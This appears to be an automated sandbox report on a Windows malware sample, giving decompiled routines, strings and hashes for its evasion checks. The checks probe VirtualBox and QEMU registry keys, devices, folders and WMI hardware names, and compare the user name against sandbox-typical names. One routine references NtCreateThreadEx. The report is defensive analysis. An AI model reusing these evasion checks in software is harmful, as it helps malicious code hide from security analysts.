                0x285c809ec2f
                0x285c809ec37
                0x285c809ec45
                0x285c809ec51
                0x285c809ec54
                0x285c809ec61
                0x285c809ec63
                0x285c809ec6b
                0x285c809ec6f
                0x285c809ec7c
                0x285c809ec84
                0x285c809ec8c
                0x285c809ec99
                0x285c809ec9e
                0x285c809eca7
                0x285c809ecad
                0x285c809ecb6
                0x285c809ecc0
                0x285c809ecca
                0x285c809eccd
                0x285c809ece2

                APIs
                Strings
                Memory Dump Source
                • Source File: 00000013.00000002.549903895.00000285C8050000.00000040.10000000.00040000.00000000.sdmp, Offset: 00000285C8050000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_19_2_285c8050000_rundll32.jbxd
                Yara matches
                Similarity
                • API ID: String$ClearVariantwcsstr$AllocFreeUninitialize$Initialize
                • String ID: Caption$Name$PNPDeviceID$SELECT * FROM Win32_PnPDevice$VBOX$VEN_VBOX$WQL
                • API String ID: 2434920835-607120894
                • Opcode ID: 5aa1f58cb5f901136934106e8843b5e603d9b9fd745bbfcba6568d784e6256d7
                • Instruction ID: 8e88e0ddd500e9a7c164f6186e55fcae0359d76ddd936022e0e22fe41a5e53a5
                • Opcode Fuzzy Hash: 5aa1f58cb5f901136934106e8843b5e603d9b9fd745bbfcba6568d784e6256d7
                • Instruction Fuzzy Hash: 1E816D7A302F6086EB10DF65E84829D37A0F784F98F449116EE9E53B68DF78C985CB40
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00000285C805C180 Relevance: 21.1, APIs: 9, Strings: 3, Instructions: 76threadlibraryloaderCOMMON
                Download Yara Rule

                Control-flow Graph

                APIs
                Strings
                Memory Dump Source
                • Source File: 00000013.00000002.549903895.00000285C8050000.00000040.10000000.00040000.00000000.sdmp, Offset: 00000285C8050000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_19_2_285c8050000_rundll32.jbxd
                Yara matches
                Similarity
                • API ID: Thread$AddressContextProc$AllocCreateCurrentHandleModuleProcessResumeVirtual
                • String ID: NtCreateThreadEx$RtlNewSecurityObjectWithMultipleInheritance$ntdll.dll
                • API String ID: 1751073527-1139882446
                • Opcode ID: f92ac50dcbe2c94af1dc0a0c71ddab170fda9b661e52f38cfeb8d8ca3d23f767
                • Instruction ID: 570f287a48d4bd809fe318e82011e54b0329558e5ff22520c0bef678c3b1661e
                • Opcode Fuzzy Hash: f92ac50dcbe2c94af1dc0a0c71ddab170fda9b661e52f38cfeb8d8ca3d23f767
                • Instruction Fuzzy Hash: 79411739212FA481EB508BA1F84835A73E4F786B81F44C127EA4993BA4DF7CC559CF04
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00000285C809D380 Relevance: 21.1, APIs: 2, Strings: 10, Instructions: 65registryCOMMON
                Download Yara Rule

                Control-flow Graph

                C-Code - Quality: 57%
                			E00000285285C809D380(void* __eflags, signed int __rbx, void* __rdx, long long __rsi, long long _a8, long long _a16) {
				void* _v8;
				signed int _v24;
				char _v536;
				long long _v552;
				long long _v560;
				long long _v568;
				long long _v576;
				long long _v584;
				long long _v592;
				long long _v600;
				long long _v608;
				long long _v616;
				char _v632;
				long long _v648;
				void* __rdi;
				long _t28;
				void* _t34;
				void* _t37;
				void* _t39;
				signed long long _t44;
				void* _t67;
				void* _t71;
				signed long long _t72;
				void* _t74;

				_a8 = __rbx;
				_a16 = __rsi;
				_t72 = _t71 - 0x2a0;
				_t44 =  *0xc814c720; // 0xee50a592130
				_v24 = _t44 ^ _t72;
				_v616 = L"HARDWARE\\ACPI\\DSDT\\VBOX__";
				_v608 = L"HARDWARE\\ACPI\\FADT\\VBOX__";
				_v600 = L"HARDWARE\\ACPI\\RSDT\\VBOX__";
				_v592 = L"SOFTWARE\\Oracle\\VirtualBox Guest Additions";
				_v584 = L"SYSTEM\\ControlSet001\\Services\\VBoxGuest";
				_v576 = L"SYSTEM\\ControlSet001\\Services\\VBoxMouse";
				_v568 = L"SYSTEM\\ControlSet001\\Services\\VBoxService";
				_v560 = L"SYSTEM\\ControlSet001\\Services\\VBoxSF";
				_v552 = L"SYSTEM\\ControlSet001\\Services\\VBoxVideo";
				asm("o16 nop [eax+eax]");
				r8d = 0x200;
				E00000285285C80C8EF0(_t34, 0, _t37, _t39,  &_v536, __rdx, _t67, _t74);
				E00000285285C809D1D0(_t34, L"SYSTEM\\ControlSet001\\Services\\VBoxVideo",  &_v536, __rdx, L"Checking reg key %s ",  *((intOrPtr*)(_t72 + 0x40 + __rbx * 8)));
				_v632 = __rsi;
				r9d = 0x20019;
				_v648 =  &_v632;
				r8d = 0;
				_t28 = RegOpenKeyExW(??, ??, ??, ??, ??); // executed
				if (_t28 == 0) goto 0xc809d48f;
				if (__rbx + 1 - 9 < 0) goto 0xc809d420;
				goto 0xc809d49f;
				RegCloseKey(??);
				return E00000285285C80C59D0(_t34, _v24 ^ _t72,  *((intOrPtr*)(_t72 + 0x40 + __rbx * 8)),  *((intOrPtr*)(_t72 + 0x40 + __rbx * 8)));
			}



























                0x285c809d380
                0x285c809d385
                0x285c809d38b
                0x285c809d392
                0x285c809d39c
                0x285c809d3ad
                0x285c809d3bb
                0x285c809d3c7
                0x285c809d3d3
                0x285c809d3df
                0x285c809d3eb
                0x285c809d3f7
                0x285c809d403
                0x285c809d40f
                0x285c809d417
                0x285c809d42a
                0x285c809d430
                0x285c809d451
                0x285c809d45b
                0x285c809d460
                0x285c809d466
                0x285c809d46b
                0x285c809d478
                0x285c809d480
                0x285c809d489
                0x285c809d48d
                0x285c809d494
                0x285c809d4c3

                APIs
                Strings
                Memory Dump Source
                • Source File: 00000013.00000002.549903895.00000285C8050000.00000040.10000000.00040000.00000000.sdmp, Offset: 00000285C8050000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_19_2_285c8050000_rundll32.jbxd
                Yara matches
                Similarity
                • API ID: CloseOpen
                • String ID: Checking reg key %s $HARDWARE\ACPI\DSDT\VBOX__$HARDWARE\ACPI\FADT\VBOX__$HARDWARE\ACPI\RSDT\VBOX__$SOFTWARE\Oracle\VirtualBox Guest Additions$SYSTEM\ControlSet001\Services\VBoxGuest$SYSTEM\ControlSet001\Services\VBoxMouse$SYSTEM\ControlSet001\Services\VBoxSF$SYSTEM\ControlSet001\Services\VBoxService$SYSTEM\ControlSet001\Services\VBoxVideo
                • API String ID: 47109696-1723177289
                • Opcode ID: 7c6d4f493a34af7b555b709912d8c17efb4898b449d05045ffe067657bead6d7
                • Instruction ID: e8220d28ebb0d949e5fdce8439ab4c30692996f2a9184db8eaa6834d4e5a6ef9
                • Opcode Fuzzy Hash: 7c6d4f493a34af7b555b709912d8c17efb4898b449d05045ffe067657bead6d7
                • Instruction Fuzzy Hash: 4D311C3A626FA09AEA508B11F44838A73E8F788785F908127EA9D53B64DF3CD154DF40
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00000285C80A0410 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 94comCOMMON
                Download Yara Rule

                Control-flow Graph

                APIs
                Strings
                Memory Dump Source
                • Source File: 00000013.00000002.549903895.00000285C8050000.00000040.10000000.00040000.00000000.sdmp, Offset: 00000285C8050000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_19_2_285c8050000_rundll32.jbxd
                Yara matches
                Similarity
                • API ID: Initialize$CreateInstanceSecurityUninitialize
                • String ID: ROOT\CIMV2
                • API String ID: 374467530-2786109267
                • Opcode ID: fe0e92e4dadc3a28f1dd3e5db6db49aa1143a83b0ab456d7d3ad11889142bd40
                • Instruction ID: 1d57f8868777ecd61848cdc88edf9794352a750cb31f028f3a96d30392550cb4
                • Opcode Fuzzy Hash: fe0e92e4dadc3a28f1dd3e5db6db49aa1143a83b0ab456d7d3ad11889142bd40
                • Instruction Fuzzy Hash: 1B418B3A21AFA0C6E7508F25F84874E77A0F788B84F048116EA8A93B68DF3DD155CF00
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00000285C809CD00 Relevance: 16.0, APIs: 4, Strings: 5, Instructions: 248COMMON
                Download Yara Rule
                C-Code - Quality: 46%
                			E00000285285C809CD00() {
				void* _t1;
				void* _t4;
				void* _t5;
				void* _t7;

				_t1 = E00000285285C80A0220(_t4, _t5, 0xc8112210, _t7); // executed
				if (_t1 == 0) goto 0xc809cd1b;
				return 1;
			}







                0x285c809cd0b
                0x285c809cd12
                0x285c809cd1a

                Strings
                Memory Dump Source
                • Source File: 00000013.00000002.549903895.00000285C8050000.00000040.10000000.00040000.00000000.sdmp, Offset: 00000285C8050000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_19_2_285c8050000_rundll32.jbxd
                Yara matches
                Similarity
                • API ID: Heap$AllocProcess
                • String ID: VBoxTrayToolWnd$VBoxTrayToolWndClass$kernel32.dll$procexp64.exe$wine_get_unix_file_name
                • API String ID: 1617791916-1515944515
                • Opcode ID: e559b21eaf4453db3006efa7926f78824bda33216fb645cfeb22fd8fc1f14866
                • Instruction ID: 977a629888cfa632ee5a895972094006ba5acc09c024c4fca76b27414433435d
                • Opcode Fuzzy Hash: e559b21eaf4453db3006efa7926f78824bda33216fb645cfeb22fd8fc1f14866
                • Instruction Fuzzy Hash: 7581E36F753F3042FA6467755D8978A0285EF84780F0D822BAE29F72DAEE5DC8014BC1
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00000285C809EEA0 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 104COMMON
                Download Yara Rule
                C-Code - Quality: 46%
                			E00000285285C809EEA0(long long __rbx, long long __rsi, long long __rbp, void* __r9, long long _a8, long long _a16, long long _a24) {
				void* _v8;
				signed int _v24;
				char _v536;
				char _v1064;
				char _v1592;
				long long _v1608;
				long long _v1616;
				intOrPtr _v1624;
				void* __rdi;
				signed char _t30;
				void* _t33;
				void* _t40;
				void* _t43;
				signed long long _t50;
				void* _t65;
				void* _t70;
				void* _t77;
				void* _t80;
				void* _t83;

				_t83 = __r9;
				_a16 = __rbp;
				_a24 = __rsi;
				_t50 =  *0xc814c720; // 0xee50a592130
				_v24 = _t50 ^ _t77 - 0x00000670;
				r8d = 0x208;
				E00000285285C80C8EF0(_t33, 0, _t40, _t43,  &_v1592, _t65, _t70, _t80);
				_a8 = __rbx;
				_v1616 = L"qemu-ga";
				_v1608 = L"SPICE Guest Tools";
				asm("o16 nop [eax+eax]");
				r8d = 0x200;
				E00000285285C80C8EF0(_t33, 0, 0, _t43,  &_v536, _t65, _t70, _t80);
				_v1624 = 0;
				if ( *0xc814e430 == 8) goto 0xc809efe9;
				if (1 - 0x1e < 0) goto 0xc809ef31;
				r9d = 0;
				_t11 = _t83 + 0x26; // 0x26
				r8d = _t11;
				__imp__SHGetSpecialFolderPathW();
				__imp__PathCombineW();
				E00000285285C809D1D0(0, 0x285c814e460,  &_v536,  &_v1064, L"Checking QEMU directory %s ",  &_v1592);
				_t30 = GetFileAttributesW(??); // executed
				if (_t30 == 0xffffffff) goto 0xc809efad;
				if ((_t30 & 0x00000010) != 0) goto 0xc809f068;
				if (_t70 + 1 - 2 < 0) goto 0xc809ef10;
				return E00000285285C80C59D0(0, _v24 ^ _t77 - 0x00000670,  &_v1064,  &_v1592);
			}






















                0x285c809eea0
                0x285c809eea0
                0x285c809eea5
                0x285c809eeb2
                0x285c809eebc
                0x285c809eecb
                0x285c809eed1
                0x285c809eedd
                0x285c809eee5
                0x285c809eefa
                0x285c809ef05
                0x285c809ef1a
                0x285c809ef20
                0x285c809ef27
                0x285c809ef34
                0x285c809ef46
                0x285c809ef48
                0x285c809ef55
                0x285c809ef55
                0x285c809ef59
                0x285c809ef71
                0x285c809ef90
                0x285c809ef9a
                0x285c809efa3
                0x285c809efa7
                0x285c809efb4
                0x285c809efe8

                APIs
                Strings
                Memory Dump Source
                • Source File: 00000013.00000002.549903895.00000285C8050000.00000040.10000000.00040000.00000000.sdmp, Offset: 00000285C8050000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_19_2_285c8050000_rundll32.jbxd
                Yara matches
                Similarity
                • API ID: Path$AttributesCombineCurrentEnvironmentExpandFileFolderProcessSpecialStrings
                • String ID: %ProgramW6432%$Checking QEMU directory %s $SPICE Guest Tools$qemu-ga
                • API String ID: 3908115579-2146621234
                • Opcode ID: 088ef6efb16eb6c2bb64d86321745261a28a4a8d70cfc7deaef236013a9aa593
                • Instruction ID: acf29809158818f10b164cb6df65ae91f463acc0eca5cc3dab22c2564ff04a41
                • Opcode Fuzzy Hash: 088ef6efb16eb6c2bb64d86321745261a28a4a8d70cfc7deaef236013a9aa593
                • Instruction Fuzzy Hash: CC41AF3A216FA4C5EB208F14E44839E73A5F789B85F948227D69D53BA5DF3CC905CB40
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00000285C80A0220 Relevance: 15.1, APIs: 10, Instructions: 74memoryCOMMON
                Download Yara Rule
                APIs
                Memory Dump Source
                • Source File: 00000013.00000002.549903895.00000285C8050000.00000040.10000000.00040000.00000000.sdmp, Offset: 00000285C8050000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_19_2_285c8050000_rundll32.jbxd
                Yara matches
                Similarity
                • API ID: Heap$Process$AdaptersAllocFreeInfo
                • String ID:
                • API String ID: 2824440793-0
                • Opcode ID: 9c061581dfea897cd26754b9f8105845bc69f0a82cb52782afe093cfc218019c
                • Instruction ID: bcbb4d81217d2bfb0d51127ce91dd3faa7522c6adff53e894a279f69a5e5ae9c
                • Opcode Fuzzy Hash: 9c061581dfea897cd26754b9f8105845bc69f0a82cb52782afe093cfc218019c
                • Instruction Fuzzy Hash: 88318B3D607FA082EB948B56A45829967E1E78AB81F08C067EE4913755EE3CC5548B01
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00000285C809D870 Relevance: 14.1, APIs: 2, Strings: 6, Instructions: 60fileCOMMON
                Download Yara Rule
                C-Code - Quality: 55%
                			E00000285285C809D870(void* __eflags, signed int __rbx, long long __rsi, long long __rbp, void* __r9, long long _a8, long long _a16, long long _a24) {
				void* _v8;
				signed int _v24;
				char _v536;
				long long _v552;
				long long _v560;
				long long _v568;
				long long _v576;
				long long _v584;
				long long _v600;
				intOrPtr _v608;
				intOrPtr _v616;
				void* __rdi;
				void* _t32;
				void* _t36;
				void* _t38;
				signed long long _t43;
				long long _t49;
				void* _t59;
				void* _t66;
				signed long long _t67;
				void* _t69;
				void* _t71;

				_t71 = __r9;
				_a8 = __rbx;
				_a16 = __rbp;
				_a24 = __rsi;
				_t67 = _t66 - 0x280;
				_t43 =  *0xc814c720; // 0xee50a592130
				_v24 = _t43 ^ _t67;
				_v584 = L"\\\\.\\VBoxMiniRdrDN";
				_v576 = L"\\\\.\\VBoxGuest";
				_v568 = L"\\\\.\\pipe\\VBoxMiniRdDN";
				_v560 = L"\\\\.\\VBoxTrayIPC";
				_t49 = L"\\\\.\\pipe\\VBoxTrayIPC";
				_v552 = _t49;
				_t60 =  *((intOrPtr*)(_t67 + 0x40 + __rbx * 8));
				r9d = 0;
				_v600 = __rbp;
				_v608 = 0x80;
				_v616 = 3;
				_t16 = _t71 + 1; // 0x1, executed
				r8d = _t16;
				CreateFileW(??, ??, ??, ??, ??, ??, ??); // executed
				r8d = 0x200;
				E00000285285C80C8EF0(_t32, 0, _t36, _t38,  &_v536, _t59,  *((intOrPtr*)(_t67 + 0x40 + __rbx * 8)), _t69);
				E00000285285C809D1D0(_t32, _t49,  &_v536, _t59, L"Checking device %s ",  *((intOrPtr*)(_t67 + 0x40 + __rbx * 8)));
				if (_t49 != 0xffffffff) goto 0xc809d950;
				if (__rbx + 1 - 5 < 0) goto 0xc809d8e0;
				goto 0xc809d95e;
				CloseHandle(??);
				return E00000285285C80C59D0(_t32, _v24 ^ _t67, _t59, _t60);
			}

























                0x285c809d870
                0x285c809d870
                0x285c809d875
                0x285c809d87a
                0x285c809d880
                0x285c809d887
                0x285c809d891
                0x285c809d8a2
                0x285c809d8b0
                0x285c809d8bc
                0x285c809d8c8
                0x285c809d8cd
                0x285c809d8d4
                0x285c809d8e0
                0x285c809d8e5
                0x285c809d8e8
                0x285c809d8f2
                0x285c809d8fd
                0x285c809d905
                0x285c809d905
                0x285c809d909
                0x285c809d916
                0x285c809d91f
                0x285c809d938
                0x285c809d941
                0x285c809d94a
                0x285c809d94e
                0x285c809d953
                0x285c809d986

                APIs
                Strings
                Memory Dump Source
                • Source File: 00000013.00000002.549903895.00000285C8050000.00000040.10000000.00040000.00000000.sdmp, Offset: 00000285C8050000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_19_2_285c8050000_rundll32.jbxd
                Yara matches
                Similarity
                • API ID: CloseCreateFileHandle
                • String ID: Checking device %s $\\.\VBoxGuest$\\.\VBoxMiniRdrDN$\\.\VBoxTrayIPC$\\.\pipe\VBoxMiniRdDN$\\.\pipe\VBoxTrayIPC
                • API String ID: 3498533004-4225997269
                • Opcode ID: c9cc4e11c399b33a74f671cb02cb25218be533300bb4ec664d672f236775e40b
                • Instruction ID: e4a5d78527a909862c1ec43eb1222c25b14e6a64d4332a3a87f60d7f489df7db
                • Opcode Fuzzy Hash: c9cc4e11c399b33a74f671cb02cb25218be533300bb4ec664d672f236775e40b
                • Instruction Fuzzy Hash: 58212C39216F9086E7509B51F44838AB3A4F7887A0F509226DAA813BA8DF3DC545CB80
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00000285C80A0330 Relevance: 12.1, APIs: 8, Instructions: 57processCOMMON
                Download Yara Rule
                APIs
                Memory Dump Source
                • Source File: 00000013.00000002.549903895.00000285C8050000.00000040.10000000.00040000.00000000.sdmp, Offset: 00000285C8050000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_19_2_285c8050000_rundll32.jbxd
                Yara matches
                Similarity
                • API ID: Process32$CloseHandleNext$CreateFirstSnapshotToolhelp32
                • String ID:
                • API String ID: 3656348920-0
                • Opcode ID: 65d409781a766cb7afe0c01d1b1068d1319270dcc6e4b659f92ea677d2ab12ba
                • Instruction ID: c475a34afef800d6707559fa6b9a7079c54e0575c62bf5d68c6b42c9eb1904d2
                • Opcode Fuzzy Hash: 65d409781a766cb7afe0c01d1b1068d1319270dcc6e4b659f92ea677d2ab12ba
                • Instruction Fuzzy Hash: C721843E306F94C2EB60CB21E84D35A63E4FB89BD5F44C2229A9956694EF3CC605CF00
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00000285C809F810 Relevance: 33.3, APIs: 1, Strings: 18, Instructions: 89COMMON
                Download Yara Rule

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 1072 285c809f810-285c809f91f call 285c80caeac 1075 285c809f921-285c809f931 GetUserNameW 1072->1075 1076 285c809f93b 1072->1076 1077 285c809f933-285c809f936 call 285c80caea4 1075->1077 1078 285c809f959-285c809f975 1075->1078 1079 285c809f940-285c809f958 call 285c80c59d0 1076->1079 1077->1076 1082 285c809f980-285c809f9ae call 285c809d1d0 call 285c80d19f0 1078->1082 1088 285c809f9b0-285c809f9b7 1082->1088 1089 285c809f9bb 1082->1089 1088->1082 1091 285c809f9b9 1088->1091 1090 285c809f9c0-285c809f9e2 call 285c80caea4 1089->1090 1090->1079 1091->1090
                APIs
                Strings
                Memory Dump Source
                • Source File: 00000013.00000002.549903895.00000285C8050000.00000040.10000000.00040000.00000000.sdmp, Offset: 00000285C8050000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_19_2_285c8050000_rundll32.jbxd
                Yara matches
                Similarity
                • API ID: NameUser
                • String ID: Checking if username matches : %s $CurrentUser$Emily$HAPUBWS$Hong Lee$IT-ADMIN$John Doe$Johnson$Miller$Peter Wilson$Sandbox$maltest$malware$milozs$sand box$test user$timmy$virus
                • API String ID: 2645101109-2358638013
                • Opcode ID: 2aec333ae91d2ab1eb2999078d7cb70e0cf30a0df4f06511f96c67f64b4f8555
                • Instruction ID: 9fb9e08a4cfc4dca233ed72d597a7f7c21f826e3ad4f7a0f5d7031f865cee972
                • Opcode Fuzzy Hash: 2aec333ae91d2ab1eb2999078d7cb70e0cf30a0df4f06511f96c67f64b4f8555
                • Instruction Fuzzy Hash: 7941E239226FA195EA11CB01F48839AB3E8FB887D0F509227DA9C13765EF7CD549CB40
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00000285C809E3A0 Relevance: 31.6, APIs: 11, Strings: 7, Instructions: 147memoryCOMMON
                Download Yara Rule

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 1094 285c809e3a0-285c809e3c7 call 285c80a0410 1097 285c809e3cd-285c809e403 SysAllocString * 2 1094->1097 1098 285c809e5ab-285c809e5b3 1094->1098 1099 285c809e405-285c809e408 1097->1099 1100 285c809e45a-285c809e462 1097->1100 1101 285c809e451-285c809e454 SysFreeString 1099->1101 1102 285c809e40a-285c809e426 1099->1102 1103 285c809e46d-285c809e475 1100->1103 1104 285c809e464-285c809e467 SysFreeString 1100->1104 1101->1100 1107 285c809e430-285c809e432 1102->1107 1105 285c809e59d-285c809e5aa 1103->1105 1106 285c809e47b-285c809e48b 1103->1106 1104->1103 1108 285c809e491-285c809e49f 1106->1108 1109 285c809e576-285c809e599 CoUninitialize 1106->1109 1107->1101 1110 285c809e434-285c809e44b CoUninitialize 1107->1110 1111 285c809e4a0-285c809e4bf 1108->1111 1109->1105 1110->1101 1115 285c809e572 1111->1115 1116 285c809e4c5-285c809e4e1 1111->1116 1115->1109 1119 285c809e4e7-285c809e4e9 1116->1119 1121 285c809e4eb-285c809e4f3 1119->1121 1122 285c809e559-285c809e56a 1119->1122 1121->1122 1123 285c809e4f5-285c809e4f7 1121->1123 1122->1111 1128 285c809e570 1122->1128 1124 285c809e54f-285c809e553 VariantClear 1123->1124 1125 285c809e4f9-285c809e50c call 285c80c9740 1123->1125 1124->1122 1130 285c809e54d 1125->1130 1131 285c809e50e-285c809e521 call 285c80c9740 1125->1131 1128->1109 1130->1124 1131->1130 1134 285c809e523-285c809e536 call 285c80c9740 1131->1134 1134->1130 1137 285c809e538-285c809e54b call 285c80c9740 1134->1137 1137->1124 1137->1130
                C-Code - Quality: 26%
                			E00000285285C809E3A0(void* __edx, void* __rax, long long __rbx, long long __rsi, long long __r14, char _a8, void* _a16, void* _a24, void* _a32) {
				long long _v24;
				long long _v32;
				long long _v40;
				intOrPtr _v56;
				signed short _v64;
				void* _v72;
				long long _v80;
				long long _v88;
				void* _t53;
				void* _t54;
				signed char _t60;
				intOrPtr _t98;
				intOrPtr* _t114;
				long long _t134;
				long long _t135;
				void* _t146;

				_t135 = __rsi;
				_a24 = _t134;
				_v72 = _t134;
				_a16 = _t134;
				_t54 = E00000285285C80A0410(_t53,  &_a24,  &_v72, __rsi); // executed
				if (_t54 == 0) goto 0xc809e5ab;
				_v24 = __rbx;
				_v32 = _t135;
				_v40 = __r14;
				__imp__#2();
				__imp__#2();
				_t9 = _t134 + 1; // 0x1
				r14d = _t9;
				_t104 = __rax;
				if (__rax == 0) goto 0xc809e45a;
				if (__rax == 0) goto 0xc809e451;
				_v80 =  &_a16;
				_t13 = _t134 + 0x30; // 0x30
				r9d = _t13;
				_v88 = _t134;
				_t145 =  *_a24;
				if ( *((intOrPtr*)( *_a24 + 0xa0))() >= 0) goto 0xc809e451;
				r14d = 0;
				 *((intOrPtr*)( *_a24 + 0x10))();
				 *((intOrPtr*)( *_v72 + 0x10))();
				__imp__CoUninitialize();
				__imp__#6();
				_t137 = _v32;
				if (__rax == 0) goto 0xc809e46d;
				__imp__#6();
				if (r14d == 0) goto 0xc809e59d;
				_t114 = _a16;
				_a32 = _t134;
				_a8 = 0;
				if (_t114 == 0) goto 0xc809e576;
				asm("o16 nop [eax+eax]");
				_v88 =  &_a8;
				r8d = 1; // executed
				 *((intOrPtr*)( *_t114 + 0x20))();
				if (_a8 == 0) goto 0xc809e572;
				_v80 = _t134;
				r8d = 0;
				_v88 = _t134;
				_t98 =  *_a32; // executed
				if ( *((intOrPtr*)(_t98 + 0x20))() < 0) goto 0xc809e559;
				_t60 = _v64 & 0x0000ffff;
				if (_t60 == 1) goto 0xc809e559;
				if ((_t60 & 0x00000008) == 0) goto 0xc809e54f;
				E00000285285C80C9740(__rax, _v56, L"82801FB", _v32,  *_a24, _t146);
				if (_t98 != 0) goto 0xc809e54d;
				E00000285285C80C9740(_t104, _v56, L"82441FX", _v32, _t145, _t146);
				if (_t98 != 0) goto 0xc809e54d;
				E00000285285C80C9740(_t104, _v56, L"82371SB", _v32, _t145, _t146);
				if (_t98 != 0) goto 0xc809e54d;
				E00000285285C80C9740(_t104, _v56, L"OpenHCD", _t137, _t145, _t146);
				if (_t98 == 0) goto 0xc809e54f;
				__imp__#9();
				 *((intOrPtr*)( *_a32 + 0x10))();
				if (_a16 != 0) goto 0xc809e4a0;
				goto 0xc809e576;
				 *((intOrPtr*)( *_a16 + 0x10))();
				 *((intOrPtr*)( *_a24 + 0x10))();
				 *((intOrPtr*)( *_v72 + 0x10))();
				__imp__CoUninitialize(); // executed
				dil = 1 - 3 >= 0;
				return 0;
			}



















                0x285c809e3a0
                0x285c809e3b4
                0x285c809e3b8
                0x285c809e3bc
                0x285c809e3c0
                0x285c809e3c7
                0x285c809e3cd
                0x285c809e3d9
                0x285c809e3de
                0x285c809e3e3
                0x285c809e3f3
                0x285c809e3f9
                0x285c809e3f9
                0x285c809e3fd
                0x285c809e403
                0x285c809e408
                0x285c809e412
                0x285c809e417
                0x285c809e417
                0x285c809e41e
                0x285c809e426
                0x285c809e432
                0x285c809e438
                0x285c809e43e
                0x285c809e448
                0x285c809e44b
                0x285c809e454
                0x285c809e45a
                0x285c809e462
                0x285c809e467
                0x285c809e475
                0x285c809e47b
                0x285c809e481
                0x285c809e485
                0x285c809e48b
                0x285c809e495
                0x285c809e4a7
                0x285c809e4b3
                0x285c809e4b9
                0x285c809e4bf
                0x285c809e4cd
                0x285c809e4d9
                0x285c809e4dc
                0x285c809e4e1
                0x285c809e4e9
                0x285c809e4eb
                0x285c809e4f3
                0x285c809e4f7
                0x285c809e504
                0x285c809e50c
                0x285c809e519
                0x285c809e521
                0x285c809e52e
                0x285c809e536
                0x285c809e543
                0x285c809e54b
                0x285c809e553
                0x285c809e560
                0x285c809e56a
                0x285c809e570
                0x285c809e579
                0x285c809e583
                0x285c809e58d
                0x285c809e590
                0x285c809e599
                0x285c809e5aa

                APIs
                Strings
                Memory Dump Source
                • Source File: 00000013.00000002.549903895.00000285C8050000.00000040.10000000.00040000.00000000.sdmp, Offset: 00000285C8050000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_19_2_285c8050000_rundll32.jbxd
                Yara matches
                Similarity
                • API ID: Stringwcsstr$AllocFreeUninitialize$ClearInitializeVariant
                • String ID: 82371SB$82441FX$82801FB$Name$OpenHCD$SELECT * FROM Win32_PnPEntity$WQL
                • API String ID: 1414631806-1350769890
                • Opcode ID: 4bf134cec3c182b777e19fcc72e420b7231516f775669c021be26f595d9f88ff
                • Instruction ID: 6d483d98c68b2c28a7b4855e0aab33fce1c02652add9531f1e9cb154473bcea1
                • Opcode Fuzzy Hash: 4bf134cec3c182b777e19fcc72e420b7231516f775669c021be26f595d9f88ff
                • Instruction Fuzzy Hash: 3F615B7A312F6086EB118F25E84829C77A4FB88F98F449113EE5E57B64EF78C945CB40
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00000285C809FA60 Relevance: 29.9, APIs: 11, Strings: 6, Instructions: 130memoryCOMMON
                Download Yara Rule

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 1140 285c809fa60-285c809fa87 call 285c80a0410 1143 285c809fa8d-285c809fac3 SysAllocString * 2 1140->1143 1144 285c809fc54-285c809fc5c 1140->1144 1145 285c809fac5-285c809fac8 1143->1145 1146 285c809fb1a-285c809fb22 1143->1146 1149 285c809fb11-285c809fb14 SysFreeString 1145->1149 1150 285c809faca-285c809fae6 1145->1150 1147 285c809fb2d-285c809fb3a 1146->1147 1148 285c809fb24-285c809fb27 SysFreeString 1146->1148 1147->1144 1151 285c809fb40-285c809fb4e 1147->1151 1148->1147 1149->1146 1152 285c809faf0-285c809faf2 1150->1152 1153 285c809fc30-285c809fc4e CoUninitialize 1151->1153 1154 285c809fb54-285c809fb58 1151->1154 1152->1149 1155 285c809faf4-285c809fb0b CoUninitialize 1152->1155 1153->1144 1156 285c809fb60-285c809fb7f 1154->1156 1155->1149 1156->1153 1160 285c809fb85-285c809fba1 1156->1160 1163 285c809fba7-285c809fba9 1160->1163 1165 285c809fbfe-285c809fc0f 1163->1165 1166 285c809fbab-285c809fbb0 1163->1166 1165->1156 1173 285c809fc15 1165->1173 1167 285c809fbf4-285c809fbf8 VariantClear 1166->1167 1168 285c809fbb2-285c809fbc6 StrStrIW 1166->1168 1167->1165 1169 285c809fc17-285c809fc2b VariantClear 1168->1169 1170 285c809fbc8-285c809fbdc StrStrIW 1168->1170 1169->1153 1170->1169 1172 285c809fbde-285c809fbf2 StrStrIW 1170->1172 1172->1167 1172->1169 1173->1153
                APIs
                Strings
                Memory Dump Source
                • Source File: 00000013.00000002.549903895.00000285C8050000.00000040.10000000.00040000.00000000.sdmp, Offset: 00000285C8050000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_19_2_285c8050000_rundll32.jbxd
                Yara matches
                Similarity
                • API ID: String$AllocClearFreeUninitializeVariant$Initialize
                • String ID: HVM domU$Model$SELECT * FROM Win32_ComputerSystem$VMWare$VirtualBox$WQL
                • API String ID: 4173814494-4167877488
                • Opcode ID: 683a3aaf5bad5a9c9ead025d1d331b348d13d01f0072b0bfa3293400a34c3393
